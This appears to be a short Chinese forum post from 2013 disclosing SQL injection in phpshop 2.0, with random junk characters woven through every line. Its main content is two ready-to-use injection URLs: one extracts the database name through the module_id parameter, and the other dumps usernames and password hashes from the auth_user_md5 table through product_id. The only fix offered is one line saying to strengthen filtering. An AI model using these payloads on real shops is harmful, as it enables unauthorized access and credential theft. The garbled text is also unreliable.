标题 : phpshop 2.0 SQL Injection Vulnerability
3 N( h- ~& D4 `( Y" e5 v/ b4 o0 ?" t: _, |- X2 ^; Z
作者 : By onestree
: i, J4 ~7 S- F4 |9 \- J7 f2 ~下载地址 : http://code.google.com/p/phpshop/downloads/list. ^7 k! F( D* c8 v0 X! H* h) I
测试地址: windows 7 / ubuntu
, w& ~; X4 Q' p1 M3 M9 Q 6 p, y3 [/ N& b3 Y1 `9 Z
# @7 W9 w1 ?( [7 f0 P/ p; H
SQLi p0c:
8 y, [' F/ K8 M( M R5 R- v
+ j) M0 S1 v( F6 H9 }" J+ k==================
& y4 U$ o P |
. C( j6 ^/ z2 _$ X$ W# o/ whttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'% }5 z( W% s" _( j6 \! @
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
9 I( r- }7 A: e e. c
5 \ p$ ^8 I1 \) J8 U/ I. Nhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--5 e9 [3 p! L, d2 _) P6 i
$ l, _4 o: _! {修复:* W6 {/ x- G; ?
加强过滤0 ~1 L% L1 H0 @* E. ^5 B5 |
* q9 F" |8 s, K8 s2 _' _7 U: `. k" I" o( I+ q, f+ i! l" j
|
发表于 2013-1-18 18:24:10
收藏
支持
反对